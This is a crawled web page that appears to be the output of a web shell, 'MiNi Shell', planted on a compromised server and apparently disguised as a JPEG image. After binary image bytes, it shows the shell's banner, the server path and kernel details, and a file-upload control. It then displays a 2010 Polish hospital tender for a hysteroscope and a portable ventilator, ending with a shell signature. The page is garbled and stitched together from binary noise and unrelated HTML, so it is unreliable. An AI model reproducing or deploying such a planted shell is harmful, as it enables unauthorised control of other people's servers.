JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/320158-N-2010.html

<p class="kh_header"><b>Radom: zakup, dostawa, montaż histeroskopu 3 mm z torem wizyjnym 1 szt., respiratora przenośnego 1 szt. dla potrzeb wyposażenia Pawilonu Ginekologiczno - Położniczego  Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 320158 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup, dostawa, montaż histeroskopu 3 mm z torem wizyjnym 1 szt., respiratora przenośnego 1 szt. dla potrzeb wyposażenia Pawilonu Ginekologiczno - Położniczego  Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 - histeroskop 3 mm z torem wizyjnym 1 szt.
Wartość zamówienia: 102.804,00PLN 
Część nr 2 - respirator przenośny 1 szt.
Wartość zamówienia: 37.383,00 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Część nr 1 - histeroskop 3 mm z torem wizyjnym 1 szt.
wartość zamówienia uzupełniającego: 20.560,80 PLN 

Część nr 2 - respirator przenośny 1 szt.
wartość zamówienia uzupełniającego: 37.383,00 PLN</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.17.20.00-6, 33.16.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część nr 1 -   2.056,00 zł (słownie: dwa tysiące pięćdziesiąt sześć złotych 00/100).
Część nr 2 -      747,00 zł (słownie: siedemset czterdzieści siedem złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał  min 1 dostawę  oferowanego towaru w danej części.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania, jeżeli ofertę składa pełnomocnik.
2.	Dokument potwierdzający wniesienie wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa może ulec zmianie w zakresie terminu wykonania oraz warunków płatności.
2.	Przedmiotem zmian treści umowy mogą być zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia
26-600 Radom, ul. Lekarska 4 pok. nr 316.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2010 godzina 12:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia
26-600 Radom, ul. Lekarska 4 pok. nr 308.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> wniosek o dofinansowanie ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WM 2007-2013 Działanie 7.1- projekt kluczowy pt.Budowa Pawilonu Ginekologiczno Polożniczego z wykorzystaniem istnejacej konstrukcji w Radomskim Szpitalu Specjalistycznym im dr Tytusa Chałubińskiego wraz z jego wyposażeniem..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> histeroskop 3 mm z torem wizyjnym 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	Parametry wymagane graniczne
I.	Monitor - 1kpl
1.		Kolorowy monitor medyczny ciekłokrystaliczny LCD TFT
2.		Przekątna ekranu min. 19.
3.		Rozdzielczość 1280x1024.
4.		Jasność min. 450cd/m2.
5.		Stosunek kontrastu obrazu 650:1.
6.		Wejścia analogowe: Composite Video, S-Video, RGB.
7.		Wejścia cyfrowe: SDI, HD-SDI, DVI-I.
8.		Wejścia komputerowe: VGA.
II.	Źródło światła- 1 kpl.
9.		Źródło światła ksenonowego, medyczne lub LED.
10.		Moc min. 175W.
11.		Płynna regulacja natężenia oświetlenia.
III.	Kamera endoskopowa- 1 kpl.
12.		Medyczna kamera endoskopowa analogowa lub cyfrowa.
13.		Głowica kamery wyposażona w min.  1 przetwornik CCD.
14.		Rozdzielczość horyzontalna >450 linii lub lepsza
15.		Czułość nie gorsza niż 3 lux.
16.		Głowica kamery z wbudowanym obiektywem o zmiennej ogniskowej.
17.		Min. 1,6 zoom.
18.		Automatyczny dobór ekspozycji.
19.		Automatyczny balans bieli.
20.		Cyfrowe wzmocnienie kontrastu.
21.		Głowica kamery wyposażona w funkcję utrzymania stałej ostrości obrazu przy zmianie ogniskowej.
22.		Głowica kamery wyposażona w min. 2 programowalne przyciski.
23.		Możliwość zaprogramowania min. 4 funkcji, dostępnych bezpośrednio z przycisków głowicy kamery.
24.		Funkcja eliminacji siatki fiberoskopu z możliwością włączenia i wyłączenia dostępna w dowolnym momencie z głowicy kamery.
25.		Menu kamery wyświetlane na ekranie monitora i dostępne z przycisków głowicy kamery.
26.		Wyjście Composite Video.	lub
15-17. Sterownik kamery wyposażony w 4 wyjścia przesyłające sygnał wideo w rozdzielczości 1920x 1080 ze skanowaniem progresywnym - wyjścia DVI - 2szt, wyjście laserowe (światłowodowe) - 1szt, wyjście Displayport - 1szt.
Sterownik kamery wyposażony w wyjście analogowe S-Video - 1szt.
27.		2 wyjścia S-Video.	
28.		Cyfrowe wyjście DV.	
29.		Funkcja zatrzymania obrazu na ekranie monitora.
30.		Możliwość podłączenia klawiatury, wpisywania danych pacjenta oraz wyświetlania ich na ekranie monitora.
31.		Możliwość sterowania urządzeniem do rejestracji obrazu bezpośrednio z głowicy kamery.
IV.	Perystaltyczna pompa ssąco- płucząca do histeroskopii 1 kpl.
32.		Rolkowa pompa ssąco- płucząca do zastosowań w operacjach histeroskopowych.
33.		Zakres regulacji ciśnienia płukania 0-200 mmHg.
34.		Zakres regulacji przepływu: 0-500 ml/min.
35.		Laparoskopia : 0-1000ml/min.
36.		Zakres regulacji ciśnienia odsysania 0- (-) 0,5 bar.
37.		Automatyczny test urządzenia po włączeniu.
38.		Wskaźniki słupkowe lub numeryczne wartości rzeczywistej i zadanej przepływu.
39.		Wskaźniki słupkowe lub numeryczne wartości rzeczywistej i zadanej ciśnienia płukania.
40.		Wskaźniki słupkowe lub numeryczne wartości rzeczywistej i zadanej ciśnienia odsysania.
41.		Zapamiętywanie ostatnio używanych wartości parametrów ustawionych.
42.		Urządzenie wyposażone w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem/siecią urządzeń endoskopowych bloku operacyjnego.
43.		Zestaw drenów do histeroskopii (sterylny) - 100 szt.
44.		Zestaw drenów silikonowych do odsysania - 1 kpl  
45.		Filtry przeciwbakteryjne- szt. 10.
46.		Słój do odsysania 5 litrów wraz z pokrywą - 1 kpl.
47.		Koszyk na słój do odsysania - szt. 1.
48.		Uchwyt słoja od odsysania - szt.1
V.	Wózek endoskopowy 1 kpl.
49.		Mobilny wózek aparaturowy na czterech antystatycznych kółkach, dwa kółka wyposażone w blokadę 
50.		Dwie stałe półki lub Dwie półki z możliwością regulacji wysokości. 
51.		Jedna szuflada zamykana na kluczyk.
52.		Uchwyt na głowicę kamery.
53.		Moduł zasilający, z listwą z dwunastoma gniazdkami i dwunastoma przyłączami uziemiającymi lub Moduł zasilający, z listwą umożliwiającą podłączenie wszystkich elementów zestawu.
VI.	Instrumentarium histeroskopowe.
54.		Optyka sztywna zawierająca system soczewek wałeczkowatych, średnica 2,0mm, kierunek patrzenia 30 stopni, długość 26cm autoklawowalna - szt.3.
55.		Płaszcz operacyjny zew. o owalnym profilu ze stałym przepływem śr 4,2mm- szt.3.
56.		Płaszcz operacyjny wew. o owalnym profilu ze stałym przepływem śr 3,6mm z kanałem narzędziowym 5Fr-3 szt..
57.		Kleszcze chwytająco- biopsyjne śr 5Fr, dł. 34cm- szt.3. 
58.		Nożyczki 5Fr, dł. 34cm- szt.3.
59.		Elektroda bipolarna - szt.10.
60.		Pojemnik do sterylizacji optyk- szt.3.
61.		Światłowód O3.5mm, 230cm- szt.3.
62.		Pojemnik do sterylizacji histeroskopu- szt.3.
VII.	Informacje dodatkowe.
63.	Czas reakcji serwisu na zgłoszenie awarii w okresie gwarancji powyżej 48 godz.
64.	Czas usunięcia awarii w okresie gwarancji  max. 14 dni.
65.	Instrukcja obsługi w języku polskim.
66.	Bezpłatne szkolenie z obsługi dla personelu.
67.	Pełna gwarancja min. 24 miesiące. W okresie gwarancji Zamawiający nie ponosi żadnych kosztów związanych z obsługą serwisową urządzenia, oprócz kosztów materiałów eksploatacyjnych.
68.	Model fabrycznie nowy, rok produkcji nie wcześniej niż 2009
UWAGA: 
1. 	Przedstawione powyżej parametry są parametrami minimalnymi. Zamawiający dopuszcza lepsze parametry dotyczące w/w urządzeń.
2. 	Wykonawca zobowiązany jest dołączyć dokumenty w języku polskim, potwierdzające zgodność zadeklarowanych parametrów ze stanem faktycznym (w dokumentach tych należy czytelnie wskazać dany parametr).
3. 	Niespełnienie w/w parametrów skutkować będzie odrzuceniem oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> respirator przenośny 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Parametry wymagane
1. 		Urządzenie do używania podczas transportu na oddziałach szpitalnych
2. 		Respirator dla dorosłych
Ustawialne tryby i parametry
3. 		Tryby wentylacji :CPAP,DWUPOZIOMOWY-S,DWUPOZIOMOWY-ST,PCV,
                              (A)PCV,PSV,PSV-TV
4. 		IPAP-PS : 6-35 (cm H2O,hPa)
5. 		EPAP-PEEP : od 0-20 (cm H2O,hPa)
6. 		Częstotliwość oddechów : od 5 do 150 onm
7. 		Czas wdechu :  0,4 - 3 sekundy PCV-(A) tylko w trybie PCV
8. 		Minimalny czas wdechu : 0,3 - 2,5 sek.
9. 		Maksymalny czas wdechu : 1 - 3 sek.
10. 		Krzywa ścieżki wdechu : 0, 1, 2, 3 (ścieżka akceleracji)
                                          ( 0 maksymalna akceleracja)
11. 		Funkcja łagodnego startu : 0 - 50 min (kroki co 5 min.) wzrost stopniowy do osiągnięcia ustawionej wartości
12. 		Czujnik wdechu : 1 - 6
13. 		Czujnik wydechu : 5 - 90 (%) (odpowiednio do maksymalnej wartości przepływu wdechowego)
14. 		Bezpieczna objętość przepływu : 50 - 2500 (ml)
Mierzone  parametry
15. 		Ciśnienie w drogach oddechowym : IPAP (dodatnie ciśnienie wdechowe),EPAP  (dodatnie ciśnienie wydechowe) (-20 80) (cm H2O,hPa)
16. 		Częstotliwość:  0-99
17. 		Stosunek wdechy/wydechy : 1:4 - 4:1
18. 		Objętość przepływu wdechowego : 0, 9000 (ml)
19. 		Minutowa objętość wdechowa : 0- 40 (l/min)
Alarmy
20. 		Ciśnienie w drogach oddechowych : wysokie , niskie
21. 		Częstotliwość : wysoka , niska
22. 		Objętość przepływu wdechowego : wysoka , niska
Alarmy systemowe
23. 		Przegrzanie turbiny : sygnalizacja przegrzania turbiny
24. 		Awaria turbiny : sygnalizacja awarii turbiny 
25. 		Bezdech : przyczyna alarmu :częstotliwość =0.Gdy pacjent nie oddycha,w trybie PSV,PS (TV),dwupoziomowy S,respirator ma zapewnić kontrolowaną wentylację (nawracający bezdech)
26. 		Awaria źródła zasilania : stan awarii źródła zasilania
27. 		Poziom naładowania baterii (NiMh) : poziom naładowania baterii (krok 25%)
28. 		Bateria prawie wyładowana : przyczyna alarmu : czas pozostały do całkowitego wyładowania jest mniejszy niż 10 min.
29. 		Bateria przegrzana : sygnalizuje przegrzanie baterii
30. 		Bateria rozłączona : alarm nie możliwy do skasowania :bateria rozłączona
31. 		Czas konserwacji : alarm niskiej ważności :ponad 2000 godzin pracy
Testy wstępne
32. 		Test turbiny : poprawne funkcjonowanie turbiny
33. 		Test czujnika przepływu : poprawne funkcjonowanie czujnika przepływu
34. 		Test czujnika ciśnienia : poprawne funkcjonowanie czujnika ciśnienia
35. 		Test poziomu naładowania baterii : test poziomu naładowania baterii
36. 		Test fal elektrycznych : poprawne funkcjonowanie fal elektrycznych
37. 		Test przecieku / obwód pacjenta : sprawdza czy w obwodzie nie ma przecieku
38. 		Test uszczelki : poprawne funkcjonowanie uszczelki chłodzącej
39. 		Test alarmów audio : poprawne funkcjonowanie alarmu audio
Połączenie - źródło zasilania
40. 		Obwód pacjenta :  podwójna rura obwodu z  wielorazową zastawką wydechową
41. 		Źródło zasilania : 12V z zewnętrznego  źródła zasilania 100-240 V; I max+7,6;P max=105W
42. 		Wbudowana bateria : 12 V NiMh 1 opakowanie 4,Ah (autonomia ::2.30)
43. 		Połączenia zewnętrzne : N 1 RS232 zewnętrzne,jedno dla alarmu zewnętrznego,n.1 RJ45 interfejs do Internetu przez wejście TCP/IP
Charakterystyka zewnętrzna
44. 		Hałaśliwość : 35 dB
45. 		Wymiary : ok.240x330x210mm
46. 		Waga : do 4 kg
47. 		Zgodność z normami : EN 1281-1,IEC 601-1 , IEC 601-1-2,Directive 93/42 EEC,IEC 601-1-4,EN 794-1
48. 		Klasa i typ zgodnie z IEC 601-1 : klasa 1 typ B
49. 		Klasa zgodnie z 93/42 EEC Dir. : klasa IIb
50. 		Poziom ochrony IP : IP 44
Akcesoria dodatkowe
51. 		Obwód pacjenta : pojedyncza rura wielokrotnego użytku z zastawką wydechową
52. 		Obwód pacjenta : domyślna rura pojedyncza z zastawką wydechową 
53. 		Filtr aspiracyjny turbiny 
54. 		Filtr antybakteryjny dla pacjenta
55. 		Kabel : 12 V z lżejszym łącznikiem
56. 		Elektroniczny nawilżacz
57. 		Wózek z miejscem na respirator i akcesoria z możliwością umocowania nawilżacza.
Pozostałe 
58. 		Czas reakcji serwisu na zgłoszenie awarii w okresie gwarancji powyżej 48 godz.
59. 		Czas usunięcia awarii w okresie gwarancji  max. 14 dni.
60. 		Instrukcja obsługi w języku polskim.
61. 		Bezpłatne szkolenie z obsługi dla personelu.
62. 		Pełna gwarancja min. 24 miesiące. W okresie gwarancji Zamawiający nie ponosi żadnych kosztów związanych z obsługą serwisową urządzenia, oprócz kosztów materiałów eksploatacyjnych.
63. 		Model fabrycznie nowy, rok produkcji nie wcześniej niż 2009

UWAGA: 
1. 	Przedstawione powyżej parametry są parametrami minimalnymi. Zamawiający dopuszcza lepsze parametry dotyczące w/w urządzeń.
2. 	Wykonawca zobowiązany jest dołączyć dokumenty w języku polskim, potwierdzające zgodność zadeklarowanych parametrów ze stanem faktycznym (w dokumentach tych należy czytelnie wskazać dany parametr).
3. 	Niespełnienie w/w parametrów skutkować będzie odrzuceniem oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
